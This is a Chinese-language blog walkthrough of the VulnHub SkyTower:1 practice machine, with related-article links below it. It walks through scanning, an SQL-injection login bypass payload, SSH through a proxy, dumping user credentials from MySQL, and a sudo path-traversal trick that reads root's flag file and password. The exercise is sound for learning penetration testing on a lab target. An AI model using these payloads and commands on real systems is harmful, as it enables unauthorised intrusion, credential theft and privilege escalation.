vulnhub系列:SkyTower:1

最新推荐文章于 2024-10-10 14:15:00 发布
最新推荐文章于 2024-10-10 14:15:00 发布
阅读量400 收藏 5
点赞数 3
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140857809
版权

vulnhub系列:SkyTower:1

靶机下载

一、信息收集

nmap扫描存活

nmap 192.168.23.0/24

01

nmap扫描端口,开放22、80、3128端口

nmap 192.168.23.171 -p- -sV -Pn -O

02

dirb目录扫描,没什么发现

dirb http://192.168.23.171/

03

访问80端口,有一个登录框,测试是否存在sql注入

04

这里有返回sql报错

05

尝试万能密码,经过尝试,发现有过滤一些字符,万能密码如下

1' || 1=1 #

成功登录,这里提示通过ssh连接,且给出了账号密码

john:hereisjohn

06

二、getshell

连接ssh,无法连接,之前扫描到的3128为代理端口,可能需要代理

ssh john@192.168.23.171

07

配置代理文件,在图中位置写入代理配置

vim /etc/proxychains4.conf

08

使用代理连接ssh,还是连接不上,加-t参数,强制分配伪终端,成功连接

proxychains ssh john@192.168.23.171 -t "/bin/sh"

09

三、提权

查看当前权限,没有可利用的

sudo -l

10

那么需要考虑从数据库入手,进入/var/www,查看文件

11

在login.php文件中,发现数据库账号密码

12

登录数据库

mysql -uroot -proot

13

查库名

show databases;

14

查看SkyTech库

use SkyTech;
show tables;

15

查看login表下内容

select * from login;

16

得到其他用户的账号密码

john:hereisjohn
sara:ihatethisjob
william:senseable

ssh进行连接,并查看权限

proxychains ssh sara@192.168.23.171 -t "/bin/sh"

sudo -l

17

cat 和 ls 命令在通过/accounts/目录后,是以root权限执行的,查看当前目录

sudo ls /accounts/..

18

先查看root目录下有没有东西

sudo ls /accounts/../root

19

发现一个flag.txt,查看其内容,得到root用户密码

sudo cat /accounts/../root/flag.txt

root:theskytower

20

ssh连接root,成功连接,提权成功

proxychains ssh root@192.168.23.171 -t "/bin/sh"

21

三天三夜睡不着
关注
专栏目录
Vulnhub靶机:Skytower:1
whoami
09-14 1138
Vulnhub靶机:Skytower:1实战
Vulnhub:SkyTower:1靶机
qq_43884092的博客
03-19 158
修改/etc/proxychains4.conf,把代理指向目标的3128端口。使用弱口令:root|root,登录mysql,得到另外两个用户的密码。查看flag.txt,获得root的密码。靶机:192.168.111.236。使用ls查看root家目录下的文件。使用用户sara登录ssh。通过代理连接目标ssh。sara的sudo权限。
vulnhub靶机:Skytower
weixin_68416970的博客
09-16 517
发现accounts在根目录下,利用 accounts/ 有权限,查看 root 目录下有什么。连接不上,想起来还开放了一个3128端口,可能是ssh的代理端口,我们挂上代理试试。发现没权限,登录时发现 login.php 存在sql注入,查看一下。发现只有一个登陆框,我们随便输一个邮箱,然后密码用万能密码。点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步。就得到了一个iso镜像文件,用vmware打开。登录成功,发现了默认用户和密码。发现 root的密码为。发现了数据库账号和密码。
vulnhub SkyTower: 1
箭雨镜屋
12-21 3058
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
VulnHub靶机渗透:SKYTOWER: 1
Mysmycbx的博客
06-24 662
靶机IP:192.168.56.101发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。1、SQL注入时需要通过提示信息修改注入代码,完成绕过。2、当获得到ssh密码后,发现ssh端口无法登录时,可以查看代理服务。3、使用proxytunnel代理软件,完成代理服务。使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为 192.168.56.101:22端口,映射到本地kali的6666端口。4、
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 276
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
VulnHub-SkyTower: 1-靶机渗透学习
嗯嗯呐的博客
12-18 1339
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 靶机难度:中级(CTF) 靶机发布日期:2014年6月26日 靶机描述:该CTF是由Telspace Systems在ITWeb安全峰会和BSidesCPT(开普敦)上为CTF设计的。目的是测试中级到高级的安全爱好者使用多方面方法攻击系统并获得“标志”的能力。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 信息收集 nmap扫描靶机地址 nmap扫描端口 22 SSH 80 http
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 586
vulnhub靶场--SkyTower靶场
【甄选靶场】Vulnhub百个项目渗透——项目十一:skytower-1(代理登录ssh,绕过shell禁用)
人间体佐菲的博客
09-11 776
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.代理登录ssh2.绕过shell禁用。
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 473
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 272
vuluhub-skytower-1渗透靶场SkyTower 1提权
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3190
每台都做一做,然后记录在博客里.供自己和大家一起学习.
入门网络安全工程师要学习哪些内容
最新发布
白帽子佳奇的博客
10-10 874
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 624
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 192
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 392
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全——防火墙、IDS和IPS
L752034395的博客
10-02 911
网络安全,防火墙,包过滤、状态检测、应用层网关;入侵检测系统,IDS;入侵防御系统,IPS
Web安全 - 文件上传漏洞(File Upload Vulnerability)
小工匠
10-02 1911
文件上传漏洞是指Web应用允许用户上传文件,但没有对上传文件进行充分的验证和限制,导致攻击者可以上传恶意文件,如脚本、恶意代码等,进一步执行恶意操作。这种漏洞常见于文件管理、头像上传或文档管理等功能中。路径穿越结合文件上传:绕过文件上传目录限制,访问或执行敏感位置的文件。远程代码执行(RCE)结合文件上传:通过上传并执行恶意文件实现远程控制。跨站脚本(XSS)结合文件上传:通过文件传播恶意脚本,跨站点执行攻击。跨站请求伪造(CSRF)结合文件上传:在不知情的情况下诱使用户上传恶意文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值